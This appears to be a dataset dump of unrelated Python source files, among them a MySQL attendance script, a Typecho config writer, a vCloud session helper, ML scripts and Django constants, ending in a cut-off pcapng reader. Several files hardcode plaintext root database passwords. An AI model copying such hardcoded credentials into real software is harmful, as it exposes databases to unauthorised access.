text stringlengths 38 1.54M |
|---|
import mysql.connector
mydb = mysql.connector.connect(
host ='localhost',
user ='root',
password ='Rithic@2002',
database ='attendance'
)
mycursor = mydb.cursor()
Name = input("Enter the name of the user")
Present_or_absent = input("Enter the attendance of the user")
Reg_No = input("Enter the registration number")
sql = "INSERT INTO daily_record(Name,Status,Registration_Number) VALUES(%s,%s,%s)"
val = (Name,Present_or_absent,Reg_No)
mycursor.execute(sql,val)
mydb.commit() |
import copy
import dataclasses
from enum import Enum
import json
from interference.transformers.transformer_pipeline import Instance
from interference.scoring import ScoringCalculator
import numpy
# FIXME: Huge hack... From https://github.com/python/cpython/blob/6b1ac809b9718a369aea67b99077cdd682be2238/Lib/dataclasses.py#L1095
def _is_dataclass_instance(obj):
"""Returns True if obj is an instance of a dataclass."""
return hasattr(type(obj), '__dataclass_fields__')
def asdict(obj, *, dict_factory=dict):
"""Return the fields of a dataclass instance as a new dictionary mapping
field names to field values.
Example usage:
@dataclass
class C:
x: int
y: int
c = C(1, 2)
assert asdict(c) == {'x': 1, 'y': 2}
If given, 'dict_factory' will be used instead of built-in dict.
The function applies recursively to field values that are
dataclass instances. This will also look into built-in containers:
tuples, lists, and dicts.
"""
if not _is_dataclass_instance(obj):
raise TypeError("asdict() should be called on dataclass instances")
return _asdict_inner(obj, dict_factory)
def _asdict_inner(obj, dict_factory):
if _is_dataclass_instance(obj):
result = []
for f in dataclasses.fields(obj):
if f.repr:
value = _asdict_inner(getattr(obj, f.name), dict_factory)
result.append((f.name, value))
return dict_factory(result)
elif isinstance(obj, tuple) and hasattr(obj, '_fields'):
# obj is a namedtuple. Recurse into it, but the returned
# object is another namedtuple of the same type. This is
# similar to how other list- or tuple-derived classes are
# treated (see below), but we just need to create them
# differently because a namedtuple's __init__ needs to be
# called differently (see bpo-34363).
# I'm not using namedtuple's _asdict()
# method, because:
# - it does not recurse in to the namedtuple fields and
# convert them to dicts (using dict_factory).
# - I don't actually want to return a dict here. The main
# use case here is json.dumps, and it handles converting
# namedtuples to lists. Admittedly we're losing some
# information here when we produce a json list instead of a
# dict. Note that if we returned dicts here instead of
# namedtuples, we could no longer call asdict() on a data
# structure where a namedtuple was used as a dict key.
return type(obj)(*[_asdict_inner(v, dict_factory) for v in obj])
elif isinstance(obj, (list, tuple)):
# Assume we can create an object of this type by passing in a
# generator (which is not true for namedtuples, handled
# above).
return type(obj)(_asdict_inner(v, dict_factory) for v in obj)
elif isinstance(obj, dict):
return type(obj)((_asdict_inner(k, dict_factory),
_asdict_inner(v, dict_factory))
for k, v in obj.items())
else:
return copy.deepcopy(obj)
# FIXME: Hack over...
class EnhancedJSONEncoder(json.JSONEncoder):
def default(self, o):
if dataclasses.is_dataclass(o):
return asdict(o)
if isinstance(o, Enum):
return o.name
if type(o).__module__ == numpy.__name__:
if isinstance(o, numpy.ndarray):
return o.tolist()
else:
return o.item()
if isinstance(o, ScoringCalculator):
return o.describe()
return super().default(o) |
# VMware vCloud Python helper
# Copyright (c) 2014 Huawei, Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at #
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from nova import exception
from nova.i18n import _LW
from oslo_concurrency import lockutils
from oslo_log import log as logging
from oslo_service import loopingcall
from pyvcloud.vcloudair import VCA
from threading import Lock
LOG = logging.getLogger(__name__)
class VCloudAPISession(object):
"""Sets up a session with the vcloud and handles all
the calls made to the vcloud.
"""
def __init__(self, host_ip, host_port, server_username, server_password,
org, vdc, version, verify, service_type,
retry_count, create_session=True, scheme="https",
task_poll_interval=1):
self._host_ip = host_ip
self._server_username = server_username
self._server_password = server_password
self._org = org
self._vdc = vdc
self._version = version
self._verify = verify
self._service_type = service_type
self._retry_count = retry_count
self._scheme = scheme
self._host_port = host_port
self._session_username = None
self._session_id = None
self._vca = None
self._task_poll_interval = task_poll_interval
self._auto_lock = Lock()
if create_session:
self._create_session()
@lockutils.synchronized('hypernode-plug-unplug')
def _create_session(self):
"""Establish session with the server."""
if self._session_id and self.is_current_session_active():
LOG.debug("Current session: %s is active.",
self._session_id)
return
# Login and create new session with the server for making API calls.
LOG.debug("Logging in with username = %s.", self._server_username)
result = self.vca.login(password=self._server_password, org=self._org)
if not result:
raise exception.NovaException(
"Logging error with username:%s " % self._server_username)
result = self.vca.login(
token=self.vca.token,
org=self._org,
org_url=self.vca.vcloud_session.org_url)
if not result:
raise exception.NovaException(
"Logging error with username:%s with token " %
self._server_username)
self._session_id = self.vca.token
# We need to save the username in the session since we may need it
# later to check active session. The SessionIsActive method requires
# the username parameter to be exactly same as that in the session
# object. We can't use the username used for login since the Login
# method ignores the case.
self._session_username = self.vca.username
LOG.info("Successfully established new session; session ID is %s.",
self._session_id)
def is_current_session_active(self):
"""Check if current session is active.
:returns: True if the session is active; False otherwise
"""
LOG.debug("Checking if the current session: %s is active.",
self._session_id)
is_active = False
try:
is_active = self.vca.session_is_active()
except Exception:
LOG.error("Check session is active error %s." % self._session_id,
exc_info=True)
return is_active
def invoke_api(self, module, method, *args, **kwargs):
"""Wrapper method for invoking APIs.
The API call is retried in the event of exceptions due to session
overload or connection problems.
:param module: module corresponding to the VCA API call
:param method: method in the module which corresponds to the
VCA API call
:param args: arguments to the method
:param kwargs: keyword arguments to the method
:returns: response from the API call
:raises: VCloudDriverException
"""
@loopingcall.RetryDecorator(max_retry_count=self._retry_count)
def _invoke_api(module, method, *args, **kwargs):
try:
api_method = getattr(module, method)
return api_method(*args, **kwargs)
except exception as excep:
# If this is due to an inactive session, we should re-create
# the session and retry.
if self.is_current_session_active():
excep_msg = "VCloud connect error while invoking method "\
"%s.%s." % (module, method)
LOG.error(excep_msg, exc_info=True)
raise exception.NovaException(excep_msg)
else:
LOG.warn(_LW("Re-creating session due to connection "
"problems while invoking method "
"%(module)s.%(method)s."),
{'module': module,
'method': method},
exc_info=True)
self._create_session()
raise excep
return _invoke_api(module, method, *args, **kwargs)
@property
def vca(self):
if not self._vca:
self._vca = VCA(host=self._host_ip, username=self._server_username,
service_type=self._service_type,
version=self._version,
verify=self._verify)
return self._vca
@property
def vdc(self):
return self._vdc
@property
def username(self):
return self._server_username
@property
def password(self):
return self._server_password
@property
def host_ip(self):
return self._host_ip
@property
def host_port(self):
return self._host_port
@property
def org(self):
return self._org
|
import requests
import time
header = {
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:62.0) Gecko/20100101 Firefox/62.0'}
class imformation():
def __init__(self,dbhost,userurl,userpassword,dbpassword,username ,usermail):
self._dbhost = dbhost
if dbpassword == '':
self._dbpassword = '123456'
else:
self._dbpassword = dbpassword
self._userurl = userurl
self._username = username
self._userpassword = userpassword
self._usermail = usermail
self._dict = {
'dbAdapter':'Pdo_Mysql',
'dbHost':'',
'dbPort':'3306',
'dbUser':'root',
'dbPassword':'',
'dbDatabase':'typecho',
'dbCharset':'utf8',
'dbCharset':'utf8',
'dbEngine':'MyISAM',
'dbPrefix':'typecho_',
'userUrl':'',
'userName':'',
'userPassword':'',
'userMail':'',
'action':'config'}
def update(self):
self._dict["dbHost"] = self._dbhost
self._dict['dbPassword'] = self._dbpassword
self._dict['userUrl'] = "http://" + self._userurl
self._dict['userMail'] = self._usermail
self._dict['userName'] = self._username
self._dict['userPassword'] = self._userpassword
"""def sent(self):
url = 'http://'+self._userurl+ '/install.php?config'
self.update()
print(url)
print(self._dict)
r = requests.post(url,data=self._dict,headers=header)
print(r.status_code)
print(r.text)"""
def write_conf(self):
configphp = """<?php
/**
* Typecho Blog Platform
*
* @copyright Copyright (c) 2008 Typecho team (http://www.typecho.org)
* @license GNU General Public License 2.0
* @version $Id$
*/
/** 定义根目录 */
define('__TYPECHO_ROOT_DIR__', dirname(__FILE__));
/** 定义插件目录(相对路径) */
define('__TYPECHO_PLUGIN_DIR__', '/usr/plugins');
/** 定义模板目录(相对路径) */
define('__TYPECHO_THEME_DIR__', '/usr/themes');
/** 后台路径(相对路径) */
define('__TYPECHO_ADMIN_DIR__', '/admin/');
/** 设置包含路径 */
@set_include_path(get_include_path() . PATH_SEPARATOR .
__TYPECHO_ROOT_DIR__ . '/var' . PATH_SEPARATOR .
__TYPECHO_ROOT_DIR__ . __TYPECHO_PLUGIN_DIR__);
/** 载入API支持 */
require_once 'Typecho/Common.php';
/** 程序初始化 */
Typecho_Common::init();
/** 定义数据库参数 */
$db = new Typecho_Db('Pdo_Mysql', 'typecho_');
$db->addServer(array (
'host' => '192.168.64.2',
'user' => 'root',
'password' => '123456',
'charset' => 'utf8',
'port' => '3306',
'database' => 'typecho',
'engine' => 'MyISAM',
), Typecho_Db::READ | Typecho_Db::WRITE);
Typecho_Db::set($db);
"""
configphp = configphp.replace('192.168.64.2',self._dbhost)
configphp = configphp.replace('123456',self._dbpassword)
with open("typecho/config.inc.php",'w') as f:
f.write(configphp) |
import caffe
import numpy as np
import argparse
import os
import sys
def find_in_bottom(net,id,start):
i=start+1
while i<len( net.layers):
ids=net._bottom_ids(i)
if id in ids:
return i
i=i+1
return -1
def find_in_top(net,id,start):
i=start-1
while i>=0:
ids=net._top_ids(i)
if id in ids:
return i
i=i-1
return -1
def print_top_wire(f,net,i):
self=net._layer_names[i]
top_ids=net._top_ids(i)
n=len(top_ids)
if n==0:
f.write("%s.top_blob_empty.write(true);\n"%(self))
return
if n==1:
l=find_in_bottom(net,top_ids[0],i)
if l>=0:
bottom= net._layer_names[l]
f.write("%s.top_blob_empty(%s.bottom_blob_empty);\n"%(self,bottom))
else:
f.write("%s.top_blob_empty(output_empty);\n"%(self))
else:
f.write("%s_top_and.clk(clk);\n"%(self))
f.write("%s_top_and.reset(reset);\n"%(self))
j=0
for id in top_ids:
l=find_in_bottom(net,id,i)
if l>=0:
bottom=net._layer_names[l]
f.write("%s_top_and.in[%d](%s.bottom_blob_empty);\n"%(self,j,bottom))
else:
f.write("%s_top_and.in[%d](output_empty);\n"%(self,j))
j=j+1
f.write("%s.top_blob_empty(%s_top_and.out);\n"%(self,self))
def print_bottom_wire(f,net,i):
self=net._layer_names[i]
bottom_ids=net._bottom_ids(i)
n=len(bottom_ids)
if n==0:
f.write("%s.bottom_blob_filled(input_filled);\n"%(self))
return
if n==1:
l=find_in_top(net,bottom_ids[0],i)
if l>=0:
top= net._layer_names[l]
f.write("%s.bottom_blob_filled(%s.top_blob_filled);\n"%(self,top))
else:
f.write("%s.bottom_blob_filled(input_filled);\n"%(self))
else:
# f.write("%s_bottom_and.clk(clk);\n"%(self))
# f.write("%s_bottom_and.reset(reset);\n"%(self))
j=0
for id in bottom_ids:
l=find_in_top(net,id,i)
if l>=0:
top=net._layer_names[l]
f.write("%s_bottom_and.in[%d](%s.top_blob_filled);\n"%(self,j,top))
else:
f.write("%s_bottom_and.in[%d](input_filled);\n"%(self,j))
j=j+1
f.write("%s.bottom_blob_filled(%s_bottom_and.out);\n"%(self,self))
if len(sys.argv)<3:
sys.exit(0)
model=sys.argv[1]
weights=sys.argv[2]
print(model)
print(weights)
net = caffe.Net(model, caffe.TEST)
net.copy_from(weights)
#print_net(net)
with open("gen/net_wire.cpp","w") as f:
f.write(
"""
#include "sc_net.h"
void sc_net::setup_wires()
{
"""
)
i=0
for l in net.layers:
name=net._layer_names[i]
f.write("%s.clk(clk);\n"%(name))
f.write("%s.reset(reset);\n"%(name))
print_top_wire(f,net,i)
print_bottom_wire(f,net,i)
i=i+1
s=[]
for id in net._inputs:
l=find_in_top(net,id,len(net._layer_names))
if l<0:
raise(0)
if not l in s:
s.append(l)
n=len(s)
if n<1:
raise(0)
if n>1:
i=0
# f.write("input_and.clk(clk);\n")
# f.write("input_and.reset(reset);\n")
for ss in s:
name=net._layer_names[ss]
f.write("input_and.in[%d](%s.bottom_blob_empty);\n"%(i,name))
i=i+1
f.write("input_empty(input_and.out);\n")
else:
name=net._layer_names[s[0]]
f.write("input_empty(%s.bottom_blob_empty);\n"%(name))
s=[]
for id in net._outputs:
l=find_in_top(net,id,len(net._layer_names))
if l<0:
raise(0)
if not l in s:
s.append(l)
n=len(s)
if n<1:
raise(0)
if n>1:
i=0
# f.write("output_and.clk(clk);\n")
# f.write("output_and.reset(reset);\n")
for ss in s:
name=net._layer_names[ss]
f.write("output_and.in[%d](%s.top_blob_filled);\n"%(i,name))
i=i+1
f.write("output_filled(output_and.out);\n")
else:
name=net._layer_names[s[0]]
f.write("output_filled(%s.top_blob_filled);\n"%(name))
f.write("\n}")
f.close()
|
#!/usr/bin/python
#-*- coding:utf-8 -*-
#Quick python script explanation for programmers
#给程序员的脚本解说
#导入模块
import os,sys
def main():
#声明单行字符串,使用单双引号都行,若字符串中有引号需转义 \'
print( 'hello world!')
print( '这是Bob\'的问候')
foo(5,10)
#字符串可乘,等同于==========
print ('=' * 10)
print ('这将直接执行' + 'hello world')
count = 0
count += 1
food=['红','黄','蓝','紫','黑']
for i in food:
print ('我喜欢'+i+'色')
print( '数到10')
for i in range(10):
print('%d'%(i+1))
def foo(i,j):
add=i+j
print ('%s加%s等于%s'%(i,j,add))
if add<10:
print ('aaaaaaaaaa')
elif (add>=10) and (i==1):
print ('bbbbbbbbbb')
else:
print ('cccccccccc')
return add
#当且仅当直接运行当且脚本时,条件才会成立
if __name__=='__main__':
main()
|
if __name__ == '__main__':
t = int(input())
while t > 0:
n = int(input())
arr = list(map(int, input().strip().split()))
k = int(input())
try:
print(arr.index(k))
except:
print(-1)
t-=1
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import numpy as np
import random
import tqdm_utils
def test_vocab(vocab, PAD, UNK, START, END):
return [
len(vocab),
len(np.unique(list(vocab.values()))),
int(all([_ in vocab for _ in [PAD, UNK, START, END]]))
]
def test_captions_indexing(train_captions_indexed, vocab, UNK):
starts = set()
ends = set()
between = set()
unk_count = 0
for caps in train_captions_indexed:
for cap in caps:
starts.add(cap[0])
between.update(cap[1:-1])
ends.add(cap[-1])
for w in cap:
if w == vocab[UNK]:
unk_count += 1
return [
len(starts),
len(ends),
len(between),
len(between | starts | ends),
int(all([isinstance(x, int) for x in (between | starts | ends)])),
unk_count
]
def test_captions_batching(batch_captions_to_matrix):
return (batch_captions_to_matrix([[1, 2, 3], [4, 5]], -1, max_len=None).ravel().tolist()
+ batch_captions_to_matrix([[1, 2, 3], [4, 5]], -1, max_len=2).ravel().tolist()
+ batch_captions_to_matrix([[1, 2, 3], [4, 5]], -1, max_len=10).ravel().tolist())
def get_feed_dict_for_testing(decoder, IMG_EMBED_SIZE, vocab):
return {
decoder.img_embeds: np.random.random((32, IMG_EMBED_SIZE)),
decoder.sentences: np.random.randint(0, len(vocab), (32, 20))
}
def test_decoder_shapes(decoder, IMG_EMBED_SIZE, vocab, s):
tensors_to_test = [
decoder.h0,
decoder.word_embeds,
decoder.flat_hidden_states,
decoder.flat_token_logits,
decoder.flat_ground_truth,
decoder.flat_loss_mask,
decoder.loss
]
all_shapes = []
for t in tensors_to_test:
_ = s.run(t, feed_dict=get_feed_dict_for_testing(decoder, IMG_EMBED_SIZE, vocab))
all_shapes.extend(_.shape)
return all_shapes
def test_random_decoder_loss(decoder, IMG_EMBED_SIZE, vocab, s):
loss = s.run(decoder.loss, feed_dict=get_feed_dict_for_testing(decoder, IMG_EMBED_SIZE, vocab))
return loss
def test_validation_loss(decoder, s, generate_batch, val_img_embeds, val_captions_indexed):
np.random.seed(300)
random.seed(300)
val_loss = 0
batches_for_eval = 1000
for _ in tqdm_utils.tqdm_notebook_failsafe(range(batches_for_eval)):
val_loss += s.run(decoder.loss, generate_batch(val_img_embeds,
val_captions_indexed,
32,
20))
val_loss /= 1000.
return val_loss
|
"""
Mixing Peer State and RPC Interface
"""
import asyncio
import aiozmq.rpc
class MixingPeer(rpc.AttrHandler):
def __init__(self):
self.addr = None
self.peer_id = None # hash of public key? easier to use than index which needs to assigned and reassigned
self.n_input_peers = 0
self.input_peers = []
self.n_mixing_peers = 0
self.mixing_peers = []
self.keypair = None
async def committment(self):
shares = self.c2_generate_random_shares()
await self.c3_broadcast_public_shares(self, shares)
self.wait_for_peer_shares()
def c2_generate_random_shares(self):
shares = [generate_share() for _ in input_peers]
return shares
async def c3_broadcast_public_shares(self, shares):
coros = [mixing_peer.rpc.call.c3_push_public_shares(shares)
for mixing_peer in self.mixing_peers]
results = await asyncio.gather(*coros, return_exceptions=True)
for res in results:
# validate peers received shares
pass
@rpc.method
def request_start(self):
pass
@rpc.method
def c3_push_public_shares(self, shares):
pass
class RemoteMixingPeer:
def __init__(self):
self.addr = None
self.public_key = None
self.connection = None
self.rpc = connection.rpc.call
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import os
from django.utils.translation import ugettext_lazy as _
MIN_PASSWORD_LEN = 6
VERIFY_CODE_EXPIRED_TIME = 5 * 60 # 5 minutes
TEMP_IMAGE = os.path.join(os.path.dirname(__file__), 'temp.jpg')
TEMP_VIDEO = os.path.join(os.path.dirname(__file__), 'temp.mp4')
PROFILE_FOOTER_IMAGE = '_profile.jpg'
EVENT_FOOTER_IMAGE = '_event.jpg'
EVENT_FOOTER_VIDEO = '_event.mp4'
EVENT_FOOTER_VIDEO_THUMBNAIL = '_event_video_thumbnail.jpg'
FEEDBACK_FOOTER_IMAGE = '_feedback.jpg'
DIR_EVENT_IMAGE = '/image/'
DIR_EVENT_VIDEO = '/video/'
DIR_USER_PROFILE = '/profile/'
DIR_FEEDBACK = '/feedback/'
# register & user
CODE_SUCCESS = 200
CODE_EMPTY_USER = 1201
CODE_EMPTY_BABY_NAME = 1202
CODE_EMPTY_EMAIL = 1203
CODE_EMPTY_PASSWORD = 1204
CODE_INVALID_EMAIL = 1205
CODE_INVALID_PASSWORD = 1206
CODE_DUPLICATE_USER = 1207
CODE_DUPLICATE_EMAIL = 1208
CODE_DUPLICATE_PHONE = 1209
CODE_NOT_EXISTS_EMAIL = 1210
CODE_NOT_ACTIVE = 1211
CODE_INCORRECT_USER_NAME_OR_PASSWORD = 1212
CODE_EMPTY_VERIFY_CODE = 1213
CODE_INCORRECT_VERIFY_CODE = 1214
CODE_EXPIRED_VERIFY_CODE = 1215
CODE_USER_NOT_EXISTS = 1216
# event
CODE_EMPTY_EVENT = 1301
TYPE_IMAGE = 0
TYPE_VIDEO = 1
# comment
CODE_EMPTY_COMMENT = 1401
DATE_TIME_FORMAT = ('%Y-%m-%d %H:%M:%S')
CODE_NO_CONTENT = 204
CODE_INVALID_REQUEST = 400
CODE_INVALID_TOKEN = 401
CODE_EXCEPTION = 402
CODE_DUPLICATE = 403
MSG_204 = _(u'请求数据不存在')
MSG_400 = _(u'请求数据格式不正确')
MSG_401 = _(u'AccessToken异常')
MSG_402 = _(u'接口发生异常')
MSG_403 = _(u'重复保存')
# register message
MSG_EMPTY_USERNAME = _(u'用户名不能为空')
MSG_EMPTY_BABY_NAME = _(u'宝宝名不能为空')
MSG_EMPTY_EMAIL = _(u'邮箱不能为空')
MSG_EMPTY_PASSWORD = _(u'密码不能为空')
MSG_INVALID_EMAIL = _(u'邮箱格式不正确')
MSG_NO_SUCH_EMAIL = _(u'此邮箱不存在')
MSG_INVALID_PASSWORD = _(u'密码不能少于6位')
MSG_DUPLICATE_USER = _(u'该用户已被使用')
MSG_DUPLICATE_EMAIL = _(u'该邮箱已被使用')
MSG_DUPLICATE_PHONE = _(u'该手机号码已被使用')
MSG_NOT_EXISTS_EMAIL = _(u'该邮箱不存在')
MSG_CREATE_USER_SUCCESS = _(u'用户创建成功')
MSG_GET_USERS_SUCCESS = _(u'获取用户成功')
MSG_LOGIN_SUCCESS = _(u'登入成功')
MSG_UPDATE_USER_INFO_SUCCESS = _(u'更新用户信息成功')
MSG_NOT_ACTIVE_USER = _(u'该用户暂时不可用')
MSG_INCORRECT_USER_NAME_OR_PASSWORD = _(u'用户名或账号错误')
MSG_SEND_VERIFY_CODE_SUCCESS = _(u'验证码发送成功')
MSG_EMPTY_VERIFY_CODE = _(u'验证码不能为空')
MSG_INCORRECT_VERIFY_CODE = _(u'验证码错误')
MSG_EXPIRED_VERIFY_CODE = _(u'验证码已过期')
MSG_USER_NOT_EXISTS = _(u'该用户不存在')
MSG_GET_EVENTS_SUCCESS = _(u'获取动态成功')
MSG_GET_COMMENTS_SUCCESS = _(u'获取评论成功')
MSG_SEND_FEEDBACK_SUCCESS = _(u'反馈消息发送成功')
MSG_GET_USER_DETAIL_SUCCESS = _(u'获取用户信息成功')
MSG_ADD_LIKE_SUCCESS = _(u'点赞成功')
PASSWORD_VERIFY_CODE_EMAIL_SUBJECT = _(u'忘记密码验证码-嘟嘟手记')
PASSWORD_VERIFY_CODE_EMAIL_CONTENT = _(u'您的验证码:%s。\n本邮件是系统自动发送的,请勿直接回复!感谢您的访问,祝您使用愉快!')
MSG_GET_APP_INFO_SUCCESS = _(u'获取应用版本信息')
# event message
MSG_EMPTY_EVENT = _(u'数据不能全为空')
MSG_POST_EVENT_SUCCESS = _(u'发布成功')
MSG_DELETE_EVENT_SUCCESS = _(u'删除动态成功')
MSG_DELETE_COMMENT_SUCCESS = _(u'删除评论成功')
# comment
MSG_EMPTY_COMMENT_FIELD = _(u'数据格式不正确')
MSG_POST_COMMENT_SUCCESS = _(u'评论发布成功')
# about us
MSG_NO_CONTENT = _(u'<h1 align="center">暂无内容</h1>')
# red envelopes
MSG_GET_RED_ENVELOPES_SUCCESS = _(u'获取红包列表成功')
MSG_DELETE_RED_ENVELOPE_SUCCESS = _(u'删除红包成功')
MSG_ADD_RED_ENVELOPE_SUCCESS = _(u'添加红包成功')
# iaer
MSG_GET_IAERS_SUCCESS = _(u'获取收支列表成功')
MSG_DELETE_IAER_SUCCESS = _(u'删除收支成功')
MSG_ADD_IAER_SUCCESS = _(u'添加收支成功')
|
import os
os.environ['TF_CPP_MIN_LOG_LEVEL'] = '2'
import tensorflow as tf
old_v = tf.logging.get_verbosity()
tf.logging.set_verbosity(tf.logging.ERROR)
import numpy as np
import matplotlib.pyplot as plt
model_dir = os.path.join(os.getcwd(), "model")
if not os.path.exists(model_dir):
os.makedirs(model_dir)
pass
# dataset
from tensorflow.examples.tutorials.mnist import input_data
mnist = input_data.read_data_sets('/tmp/data', one_hot=True)
n_pixels = 28*28
X = tf.placeholder(tf.float32, shape=([None, n_pixels]))
def weight_variables(shape, name):
initial = tf.truncated_normal(shape, stddev=0.1)
return tf.Variable(initial, name = name)
def bias_variable(shape, name):
initial = tf.truncated_normal(shape, stddev=0.1)
return tf.Variable(initial, name=name)
def FC_layer(x, w, b):
return tf.matmul(x, w) + b
latent_dim = 20
h_dim = 500
# Encoder -----------------------------------------------------------------------------------------
# layer 1
W_enc = weight_variables([n_pixels, h_dim], 'W_enc')
b_enc = bias_variable([h_dim], 'b_enc')
# tanh activation
h_enc = tf.nn.tanh(FC_layer(X, W_enc, b_enc))
# layer 2
W_mu = weight_variables([h_dim, latent_dim], 'W_mu')
b_mu = bias_variable([latent_dim], 'b_mu')
mu = FC_layer(h_enc, W_mu, b_mu) # mean
# standard deviation
W_logstd = weight_variables([h_dim, latent_dim], 'W_logstd')
b_logstd = bias_variable([latent_dim], 'b_logstd')
logstd = FC_layer(h_enc, W_logstd, b_logstd) # std
# RANDOMNESSSSSSSSSSSSSssss
noise = tf.random_normal([1, latent_dim])
# z is the ultimate output of our encoder
z = mu + tf.multiply(noise, tf.exp(.5 * logstd))
# Encoder -----------------------------------------------------------------------------------------
#Z = tf.placeholder(tf.float32, shape=([None, latent_dim]))
# Decoder -----------------------------------------------------------------------------------------
# layer 1
W_dec = weight_variables([latent_dim, h_dim], 'W_dec')
b_dec = bias_variable([h_dim], 'b_dec')
h_dec = tf.nn.tanh(FC_layer(z, W_dec, b_dec))
# layer 2
W_reconstruct = weight_variables([h_dim, n_pixels], 'W_reconstruct')
b_reconstruct = bias_variable([n_pixels], 'b_reconstruct')
reconstruction = tf.nn.sigmoid(FC_layer(h_dec, W_reconstruct, b_reconstruct))
# Decoder -----------------------------------------------------------------------------------------
# Loss Function
log_likelihood = tf.reduce_sum(X * tf.log(reconstruction + 1e-9) + (1 - X) * tf.log(1 - reconstruction + 1e-9), reduction_indices= 1)
# KL Divergence
KL_tern = -.5 * tf.reduce_sum(1 + 2 * logstd - tf.pow(mu, 2) - tf.exp(2 * logstd), reduction_indices= 1)
variational_lower_bound = tf.reduce_mean(log_likelihood - KL_tern)
optimizer = tf.train.AdadeltaOptimizer().minimize( - variational_lower_bound)
saver = tf.train.Saver()
init = tf.global_variables_initializer()
sess = tf.InteractiveSession()
sess.run(init)
saver.restore(sess, os.path.join(model_dir, "autoencoder_model.ckpt"))
load_model = False
if load_model:
saver.restore(sess, os.path.join(model_dir, "autoencoder_model.ckpt"))
num_pair = 10
image_indices = np.random.randint(0, 200, num_pair)
for pair in range(num_pair):
x = np.reshape(mnist.test.images[image_indices[pair]], (1, n_pixels))
plt.figure()
x_image = np.reshape(x, (28, 28))
plt.subplot(121)
plt.imshow(x_image)
x_reconstruction = reconstruction.eval(feed_dict= {X:x})
x_reconstruction_image = (np.reshape(x_reconstruction, (28, 28)))
plt.subplot(122)
plt.imshow(x_reconstruction_image)
plt.show() |
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
###############################################################################
###############################################################################
######## V1.4 2021/08/25 francescopiscitelli ######################
######## script to read the pcapng file from VMM readout
###############################################################################
###############################################################################
# import argparse
import numpy as np
import pcapng as pg
import os
import time
import sys
# from lib import libPlotting as plo
###############################################################################
###############################################################################
class readouts():
def __init__(self):
datype = 'int64'
self.Ring = -1*np.ones((0), dtype = datype)
self.Fen = -1*np.ones((0), dtype = datype)
self.VMM = -1*np.ones((0), dtype = datype)
self.hybrid = -1*np.ones((0), dtype = datype)
self.ASIC = -1*np.ones((0), dtype = datype)
self.Channel = -1*np.ones((0), dtype = datype)
self.ADC = -1*np.ones((0), dtype = datype)
self.timeStamp = np.zeros((0), dtype = datype)
self.timeCoarse = np.zeros((0), dtype = datype)
self.BC = -1*np.ones((0), dtype = datype)
self.OTh = -1*np.ones((0), dtype = datype)
self.TDC = -1*np.ones((0), dtype = datype)
self.GEO = -1*np.ones((0), dtype = datype)
self.G0 = -1*np.ones((0), dtype = datype)
self.PulseT = np.zeros((0), dtype = datype)
self.PrevPT = np.zeros((0), dtype = datype)
self.Durations = np.zeros((0), dtype = datype)
def transformInReadouts(self, data):
self.Ring = data[:,0]
self.Fen = data[:,1]
self.VMM = data[:,2]
self.hybrid = data[:,3]
self.ASIC = data[:,4]
self.Channel = data[:,5]
self.ADC = data[:,6]
self.BC = data[:,7]
self.OTh = data[:,8]
self.TDC = data[:,9]
self.GEO = data[:,10]
self.timeCoarse = data[:,11]
self.PulseT = data[:,12]
self.PrevPT = data[:,13]
self.G0 = data[:,14]
# def list(self):
# print("Rings {}".format(self.Ring))
# print("Fens {}".format(self.Fen))
def append(self, reado):
self.Ring = np.concatenate((self.Ring, reado.Ring), axis=0)
self.Fen = np.concatenate((self.Fen, reado.Fen), axis=0)
self.VMM = np.concatenate((self.VMM, reado.VMM), axis=0)
self.hybrid = np.concatenate((self.hybrid, reado.hybrid), axis=0)
self.ASIC = np.concatenate((self.ASIC, reado.ASIC), axis=0)
self.Channel = np.concatenate((self.Channel, reado.Channel), axis=0)
self.ADC = np.concatenate((self.ADC, reado.ADC), axis=0)
self.timeStamp = np.concatenate((self.timeStamp, reado.timeStamp), axis=0)
self.BC = np.concatenate((self.BC, reado.BC), axis=0)
self.OTh = np.concatenate((self.OTh, reado.OTh), axis=0)
self.TDC = np.concatenate((self.TDC, reado.TDC), axis=0)
self.GEO = np.concatenate((self.GEO, reado.GEO), axis=0)
self.G0 = np.concatenate((self.G0, reado.G0), axis=0)
self.PulseT = np.concatenate((self.PulseT, reado.PulseT), axis=0)
self.PrevPT = np.concatenate((self.PrevPT, reado.PrevPT), axis=0)
self.timeCoarse = np.concatenate((self.timeCoarse, reado.timeCoarse), axis=0)
self.Durations = np.append(self.Durations, reado.Durations)
def concatenateReadoutsInArrayForDebug(self):
leng = len(self.timeStamp)
readoutsArray = np.zeros((leng,12),dtype = 'int64')
readoutsArray[:,0] = self.Ring
readoutsArray[:,1] = self.Fen
readoutsArray[:,2] = self.hybrid
readoutsArray[:,3] = self.ASIC
readoutsArray[:,4] = self.Channel
readoutsArray[:,5] = self.ADC
readoutsArray[:,6] = self.PulseT
readoutsArray[:,7] = self.PrevPT
readoutsArray[:,8] = self.timeStamp
readoutsArray[:,9] = self.timeCoarse
readoutsArray[:,10] = self.TDC
readoutsArray[:,11] = self.G0
return readoutsArray
def sortByTimeStamps(self):
indexes = self.timeStamp.argsort(kind='quicksort')
self.timeStamp = self.timeStamp[indexes]
self.Ring = self.Ring[indexes]
self.Fen = self.Fen[indexes]
self.VMM = self.VMM[indexes]
self.hybrid = self.hybrid[indexes]
self.ASIC = self.ASIC[indexes]
self.Channel = self.Channel[indexes]
self.ADC = self.ADC[indexes]
self.BC = self.BC[indexes]
self.OTh = self.OTh[indexes]
self.TDC = self.TDC[indexes]
self.GEO = self.GEO[indexes]
self.PulseT = self.PulseT[indexes]
self.PrevPT = self.PrevPT[indexes]
self.timeCoarse = self.timeCoarse[indexes]
self.G0 = self.G0[indexes]
def calculateDuration(self):
# Tstart = np.min(self.timeStamp)
# Tstop = np.max(self.timeStamp)
try:
Tstart = self.timeStamp[0]
Tstop = self.timeStamp[-1]
except:
Tstart = 0
Tstop = 0
print('\t \033[1;33mWARNING: Not able to calculate duration! (File might be empty)\033[1;37m')
